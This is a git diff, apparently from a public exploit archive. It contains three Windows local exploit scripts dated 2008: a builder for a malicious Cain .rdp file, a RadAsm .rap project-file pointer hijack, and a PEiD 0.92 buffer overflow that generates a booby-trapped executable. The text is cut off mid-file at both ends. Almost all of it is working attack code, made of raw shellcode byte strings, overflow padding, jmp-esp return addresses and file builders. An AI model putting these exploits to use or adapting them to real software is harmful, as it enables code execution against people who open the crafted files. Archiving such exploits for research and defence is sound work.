+shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"
+shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"
+shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"
+shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"
+shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"
+shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"
+shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"
+shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"
+shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"
+shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"
+shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"
+shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"
+shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";
+
+# and if you want to test it..this shellcode will open calc.exe
+#shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
+#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"
+#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"
+#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"
+#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"
+#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"
+#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"
+#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"
+#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"
+#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"
+#shellcode+= "\xd7\xab\x63\x3d";
+
+eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7
+
+chars = "E"*8206
+print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
+print ""
+file = open('cain.rdp','w')
+file.write (chars+eip+eip+"\x90"*10+shellcode)
+file.close()
+print "D0NE!"
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/windows/local/7334.pl b/platforms/windows/local/7334.pl
index c6aa22cb7..f89189fba 100755
--- a/platforms/windows/local/7334.pl
+++ b/platforms/windows/local/7334.pl
@@ -1,66 +1,66 @@
-#!/usr/bin/perl
-# RadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit
-#Tested on Windows XP SP2 FR,perhaps work as will underWindows XP SP3.
-#Long buffer passed to the program by Group key in the project file ".rap files" can lead to Overwrite the pointer of 
-#WindowCallProcA that was stored in memory.
-#So we will over write the pointer and make it point to our shellcode address
-#This exploit was dedicated to the previous version "im to lazy to make other exploit for the newest version :)" 2.2.1 #if you want to build your own exploit, pay attention to the address of shellcode and the buffer befor and after the #shellcode.
-#Sorry for my bad english :=)
-#greetZ to:Gaming_Master,Mouradpr,Pirat_Digital,Koudelka,djug,Alpha_Hunter,DeltaAzize,synt_err,super-crystal,Al-alamE
-#Anaconda,AT4RE TEAM,Arab4Services TEAM,All Algerian Hackerz.
-
-print "\nRadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit\n";
-print "Discovered by DATA_SNIPER\n";
-print "\n";
-print "[->] Building  poc.rap..\n";
-print "[->] poc.rap Created have unf :)\n";
-# win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48".
-"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x58".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x31\x4b\x58".
-"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x56\x4b\x38\x42\x44\x42\x43\x45\x58\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b".
-"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x53\x4f\x45\x41\x33".
-"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
-"\x42\x45\x4a\x46\x50\x57\x4a\x4d\x44\x4e\x43\x37\x4a\x36\x4a\x49".
-"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x36\x43\x36\x50\x52\x45\x46\x4a\x57\x45\x56\x42\x30\x5a";
-
-$FileHeader =
-"\x5B\x50\x72\x6F\x6A\x65\x63\x74\x5D\x0D\x0A\x41\x73\x73\x65\x6D\x62\x6C\x65\x72\x3D\x6D\x61\x73\x6D\x0D\x0A\x47\x72\x6F\x75\x70".
-"\x3D\x31\x0D\x0A\x47\x72\x6F\x75\x70\x45\x78\x70\x61\x6E\x64\x3D\x31\x0D\x0A\x5B\x46\x69\x6C\x65\x73\x5D\x0D\x0A\x31\x3D\x41\x56".
-"\x50\x20\x4F\x76\x65\x72\x2E\x41\x73\x6D\x0D\x0A\x32\x3D\x41\x56\x50\x20\x4F\x76\x65\x72\x2E\x49\x6E\x63\x0D\x0A\x5B\x4D\x61\x6B".
-"\x65\x46\x69\x6C\x65\x73\x5D\x0D\x0A\x30\x3D\x41\x56\x50\x20\x4F\x76\x65\x72\x2E\x72\x65\x73\x0D\x0A\x5B\x4D\x61\x6B\x65\x44\x65".
-"\x66\x5D\x0D\x0A\x4D\x65\x6E\x75\x3D\x30\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x30\x2C\x30\x2C\x30\x2C\x30\x2C\x30".
-"\x2C\x30\x2C\x30\x2C\x30\x2C\x30\x0D\x0A\x31\x3D\x34\x2C\x4F\x2C\x24\x42\x5C\x52\x43\x2E\x45\x58\x45\x20\x2F\x76\x2C\x31\x0D\x0A".
-"\x32\x3D\x33\x2C\x4F\x2C\x24\x42\x5C\x4D\x4C\x2E\x45\x58\x45\x20\x2F\x63\x20\x2F\x63\x6F\x66\x66\x20\x2F\x43\x70\x20\x2F\x6E\x6F".
-"6C\x6F\x67\x6F\x20\x2F\x49\x22\x24\x49\x22\x2C\x32\x0D\x0A\x33\x3D\x35\x2C\x4F\x2C\x24\x42\x5C\x4C\x49\x4E\x4B\x2E\x45\x58\x45".
-"\x20\x2F\x53\x55\x42\x53\x59\x53\x54\x45\x4D\x3A\x57\x49\x4E\x44\x4F\x57\x53\x20\x2F\x52\x45\x4C\x45\x41\x53\x45\x20\x2F\x56\x45".
-"\x52\x53\x49\x4F\x4E\x3A\x34\x2E\x30\x20\x2F\x4C\x49\x42\x50\x41\x54\x48\x3A\x22\x24\x4C\x22\x20\x2F\x4F\x55\x54\x3A\x22\x24\x35".
-"\x22\x2C\x33\x0D\x0A\x34\x3D\x30\x2C\x30\x2C\x2C\x35\x0D\x0A\x35\x3D\x72\x73\x72\x63\x2E\x6F\x62\x6A\x2C\x4F\x2C\x24\x42\x5C\x43".
-"\x56\x54\x52\x45\x53\x2E\x45\x58\x45\x2C\x72\x73\x72\x63\x2E\x72\x65\x73\x0D\x0A\x36\x3D\x2A\x2E\x6F\x62\x6A\x2C\x4F\x2C\x24\x42".
-"\x5C\x4D\x4C\x2E\x45\x58\x45\x20\x2F\x63\x20\x2F\x63\x6F\x66\x66\x20\x2F\x43\x70\x20\x2F\x6E\x6F\x6C\x6F\x67\x6F\x20\x2F\x49\x22".
-"\x24\x49\x22\x2C\x2A\x2E\x61\x73\x6D\x0D\x0A\x37\x3D\x30\x2C\x30\x2C\x22\x24\x45\x5C\x4F\x6C\x6C\x79\x44\x62\x67\x22\x2C\x35\x0D".
-"\x0A\x5B\x47\x72\x6F\x75\x70\x5D\x0D\x0A\x47\x72\x6F\x75\x70\x3D";
-$hijackedPointer = "\x46\x52\x49\x00";
-$overflow = "\x41" x 2143 ;
-$INCSELEDGE = "\x41" x 66 ;
-$SD = "\x00\x0D\x0A" ;
-open(my $poc, "> POC.rap");
-print $poc $FileHeader.$INCSELEDGE.$shellcode.$overflow.$hijackedPointer.$SD;
-close($poc);
-
-# milw0rm.com [2008-12-03]
+#!/usr/bin/perl
+# RadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit
+#Tested on Windows XP SP2 FR,perhaps work as will underWindows XP SP3.
+#Long buffer passed to the program by Group key in the project file ".rap files" can lead to Overwrite the pointer of 
+#WindowCallProcA that was stored in memory.
+#So we will over write the pointer and make it point to our shellcode address
+#This exploit was dedicated to the previous version "im to lazy to make other exploit for the newest version :)" 2.2.1 #if you want to build your own exploit, pay attention to the address of shellcode and the buffer befor and after the #shellcode.
+#Sorry for my bad english :=)
+#greetZ to:Gaming_Master,Mouradpr,Pirat_Digital,Koudelka,djug,Alpha_Hunter,DeltaAzize,synt_err,super-crystal,Al-alamE
+#Anaconda,AT4RE TEAM,Arab4Services TEAM,All Algerian Hackerz.
+
+print "\nRadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit\n";
+print "Discovered by DATA_SNIPER\n";
+print "\n";
+print "[->] Building  poc.rap..\n";
+print "[->] poc.rap Created have unf :)\n";
+# win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48".
+"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x58".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x31\x4b\x58".
+"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x56\x4b\x38\x42\x44\x42\x43\x45\x58\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b".
+"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x53\x4f\x45\x41\x33".
+"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
+"\x42\x45\x4a\x46\x50\x57\x4a\x4d\x44\x4e\x43\x37\x4a\x36\x4a\x49".
+"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x36\x43\x36\x50\x52\x45\x46\x4a\x57\x45\x56\x42\x30\x5a";
+
+$FileHeader =
+"\x5B\x50\x72\x6F\x6A\x65\x63\x74\x5D\x0D\x0A\x41\x73\x73\x65\x6D\x62\x6C\x65\x72\x3D\x6D\x61\x73\x6D\x0D\x0A\x47\x72\x6F\x75\x70".
+"\x3D\x31\x0D\x0A\x47\x72\x6F\x75\x70\x45\x78\x70\x61\x6E\x64\x3D\x31\x0D\x0A\x5B\x46\x69\x6C\x65\x73\x5D\x0D\x0A\x31\x3D\x41\x56".
+"\x50\x20\x4F\x76\x65\x72\x2E\x41\x73\x6D\x0D\x0A\x32\x3D\x41\x56\x50\x20\x4F\x76\x65\x72\x2E\x49\x6E\x63\x0D\x0A\x5B\x4D\x61\x6B".
+"\x65\x46\x69\x6C\x65\x73\x5D\x0D\x0A\x30\x3D\x41\x56\x50\x20\x4F\x76\x65\x72\x2E\x72\x65\x73\x0D\x0A\x5B\x4D\x61\x6B\x65\x44\x65".
+"\x66\x5D\x0D\x0A\x4D\x65\x6E\x75\x3D\x30\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x31\x2C\x30\x2C\x30\x2C\x30\x2C\x30\x2C\x30".
+"\x2C\x30\x2C\x30\x2C\x30\x2C\x30\x0D\x0A\x31\x3D\x34\x2C\x4F\x2C\x24\x42\x5C\x52\x43\x2E\x45\x58\x45\x20\x2F\x76\x2C\x31\x0D\x0A".
+"\x32\x3D\x33\x2C\x4F\x2C\x24\x42\x5C\x4D\x4C\x2E\x45\x58\x45\x20\x2F\x63\x20\x2F\x63\x6F\x66\x66\x20\x2F\x43\x70\x20\x2F\x6E\x6F".
+"6C\x6F\x67\x6F\x20\x2F\x49\x22\x24\x49\x22\x2C\x32\x0D\x0A\x33\x3D\x35\x2C\x4F\x2C\x24\x42\x5C\x4C\x49\x4E\x4B\x2E\x45\x58\x45".
+"\x20\x2F\x53\x55\x42\x53\x59\x53\x54\x45\x4D\x3A\x57\x49\x4E\x44\x4F\x57\x53\x20\x2F\x52\x45\x4C\x45\x41\x53\x45\x20\x2F\x56\x45".
+"\x52\x53\x49\x4F\x4E\x3A\x34\x2E\x30\x20\x2F\x4C\x49\x42\x50\x41\x54\x48\x3A\x22\x24\x4C\x22\x20\x2F\x4F\x55\x54\x3A\x22\x24\x35".
+"\x22\x2C\x33\x0D\x0A\x34\x3D\x30\x2C\x30\x2C\x2C\x35\x0D\x0A\x35\x3D\x72\x73\x72\x63\x2E\x6F\x62\x6A\x2C\x4F\x2C\x24\x42\x5C\x43".
+"\x56\x54\x52\x45\x53\x2E\x45\x58\x45\x2C\x72\x73\x72\x63\x2E\x72\x65\x73\x0D\x0A\x36\x3D\x2A\x2E\x6F\x62\x6A\x2C\x4F\x2C\x24\x42".
+"\x5C\x4D\x4C\x2E\x45\x58\x45\x20\x2F\x63\x20\x2F\x63\x6F\x66\x66\x20\x2F\x43\x70\x20\x2F\x6E\x6F\x6C\x6F\x67\x6F\x20\x2F\x49\x22".
+"\x24\x49\x22\x2C\x2A\x2E\x61\x73\x6D\x0D\x0A\x37\x3D\x30\x2C\x30\x2C\x22\x24\x45\x5C\x4F\x6C\x6C\x79\x44\x62\x67\x22\x2C\x35\x0D".
+"\x0A\x5B\x47\x72\x6F\x75\x70\x5D\x0D\x0A\x47\x72\x6F\x75\x70\x3D";
+$hijackedPointer = "\x46\x52\x49\x00";
+$overflow = "\x41" x 2143 ;
+$INCSELEDGE = "\x41" x 66 ;
+$SD = "\x00\x0D\x0A" ;
+open(my $poc, "> POC.rap");
+print $poc $FileHeader.$INCSELEDGE.$shellcode.$overflow.$hijackedPointer.$SD;
+close($poc);
+
+# milw0rm.com [2008-12-03]
diff --git a/platforms/windows/local/7347.pl b/platforms/windows/local/7347.pl
index 83cef41b4..42fd0527f 100755
--- a/platforms/windows/local/7347.pl
+++ b/platforms/windows/local/7347.pl
@@ -1,135 +1,135 @@
-#!/usr/bin/perl
-# 
-# PEiD <= 0.92 Buffer Overflow Universal Exploit
-# Exploit by SkD (skdrat@hotmail.com)
-# ----------------------------------------------
-# An old vulnerability but no existing exploit 
-# for it, so here it is. Of course, I had to make it
-# universal because of that.This exploit will work
-# on all OS versions (XP, Vista, 2003, 2000).
-# You have limited space for the shellcode 
-# (around 500, it can be tweaked for more space)
-# and there are no character restrictions.
-#
-# You can download PEiD 0.92 here:
-# http://www.absolutelock.de/construction/files/releases/PEiD.zip
-#
-# To trigger the exploit, load the created executable and then
-# click the "First Bytes" arrow. 
-# Check it out :).
-#
-# Note:
-# Author has no responsibility over the damage you do with this.
-
-use strict; use warnings;
-
-# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode =
-"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19".
-"\xc5\xd8\x59\x83\xeb\xfc\xe2\xf4\xe5\x2d\x9c\x59\x19\xc5\x53\x1c".
-"\x25\x4e\xa4\x5c\x61\xc4\x37\xd2\x56\xdd\x53\x06\x39\xc4\x33\x10".
-"\x92\xf1\x53\x58\xf7\xf4\x18\xc0\xb5\x41\x18\x2d\x1e\x04\x12\x54".
-"\x18\x07\x33\xad\x22\x91\xfc\x5d\x6c\x20\x53\x06\x3d\xc4\x33\x3f".
-"\x92\xc9\x93\xd2\x46\xd9\xd9\xb2\x92\xd9\x53\x58\xf2\x4c\x84\x7d".
-"\x1d\x06\xe9\x99\x7d\x4e\x98\x69\x9c\x05\xa0\x55\x92\x85\xd4\xd2".
-"\x69\xd9\x75\xd2\x71\xcd\x33\x50\x92\x45\x68\x59\x19\xc5\x53\x31".
-"\x25\x9a\xe9\xaf\x79\x93\x51\xa1\x9a\x05\xa3\x09\x71\x35\x52\x5d".
-"\x46\xad\x40\xa7\x93\xcb\x8f\xa6\xfe\xa6\xb9\x35\x7a\xeb\xbd\x21".
-"\x7c\xc5\xd8\x59";
-my $exe_part1 = 
-"\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC8\x00\x00\x00".
-"\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F".
-"\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00".
-"\xA5\x8A\x2D\xC7\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xBE\xC9\x48\x94\xE4\xEB\x43\x94\xE1\xEB\x42\x94\xEA\xEB\x43\x94".
-"\x83\xF4\x50\x94\xE4\xEB\x43\x94\x09\xF4\x48\x94\xE3\xEB\x43\x94\x52\x69\x63\x68\xE1\xEB\x43\x94\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00\x86\xE1\x38\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\x0F\x01".
-"\x0B\x01\x06\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x72\x10\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00".
-"\x00\x10\x00\x00\x00\x02\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x04\x00\x00".
-"\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x30\x20\x00\x00\x3C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x20\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x2E\x74\x65\x78\x74\x00\x00\x00\xFC\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x72\x64\x61\x74\x61\x00\x00\x44\x01\x00\x00\x00\x20\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x40\x2E\x64\x61\x74\x61\x00\x00\x00\x3C\x02\x00\x00\x00\x30\x00\x00".
-"\x00\x02\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x6A\x00\x68\x28\x30\x40\x00\x68\x18\x30\x40\x00\x6A\x00\xFF\x15\x24\x20\x40\x00\x68\x08\x30\x40\x00\xE8\x12\x00\x00\x00\x83\xC4".
-"\x04\x33\xC0\xC3\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x81\xEC\x04\x04\x00\x00\x8D\x45\x0C\x56\x50\x8D\x85".
-"\xFC\xFB\xFF\xFF\xFF\x75\x08\x50\xFF\x15\x28\x20\x40\x00\x8B\xF0\x8D\x45\xFC\x6A\x00\x50\x8D\x85\xFC\xFB\xFF\xFF\x56\x50\x6A\xF5".
-"\xFF\x15\x08\x20\x40\x00\x50\xFF\x15\x04\x20\x40\x00\x8B\xC6\x5E\xC9\xC3\x56\xE8\x83\x00\x00\x00\x8B\xF0\xE8\x48\x00\x00\x00\x68".
-"\x04\x30\x40\x00\x68\x00\x30\x40\x00\xE8\x1F\x00\x00\x00\x6A\x00\x68\x38\x30\x40\x00\x56\xE8\x65\xFF\xFF\xFF\x83\xC4\x14\x8B\xF0".
-"\xE8\x3A\x00\x00\x00\x56\xFF\x15\x0C\x20\x40\x00\x5E\x56\x8B\x74\x24\x08\x3B\x74\x24\x0C\x73\x0D\x8B\x06\x85\xC0\x74\x02\xFF\xD0".
-"\x83\xC6\x04\xEB\xED\x5E\xC3\x6A\x20\x58\x6A\x04\x50\xA3\x30\x30\x40\x00\xE8\x0B\x01\x00\x00\x59\xA3\x2C\x30\x40\x00\x59\xC3\x8B".
-"\x0D\x34\x30\x40\x00\x85\xC9\x74\x11\xA1\x2C\x30\x40\x00\x8D\x0C\x88\x51\x50\xE8\xB5\xFF\xFF\xFF\x59\x59\xC3\x53\x56\x33\xDB\x57".
-"\x89\x1D\x38\x30\x40\x00\xFF\x15\x1C\x20\x40\x00\x8B\xF8\x57\xFF\x15\x18\x20\x40\x00\x40\x50\x53\xFF\x15\x14\x20\x40\x00\x50\xFF".
-"\x15\x00\x20\x40\x00\x8B\xF0\x3B\xF3\x75\x07\x33\xC0\xE9\xAC\x00\x00\x00\x57\x56\xFF\x15\x10\x20\x40\x00\x80\x3E\x22\x75\x1A\x46".
-"\x89\x35\x38\x30\x40\x00\x8A\x06\x3A\xC3\x74\x07\x3C\x22\x74\x03\x46\xEB\xF3\x38\x1E\x75\x1D\xEB\xD2\x89\x35\x38\x30\x40\x00\x8A".
-"\x06\x3A\xC3\x74\x0B\x3C\x20\x74\x07\x3C\x09\x74\x03\x46\xEB\xEF\x38\x1E\x74\x03\x88\x1E\x46\x6A\x01\xB9\x3C\x30\x40\x00\x58\x8A".
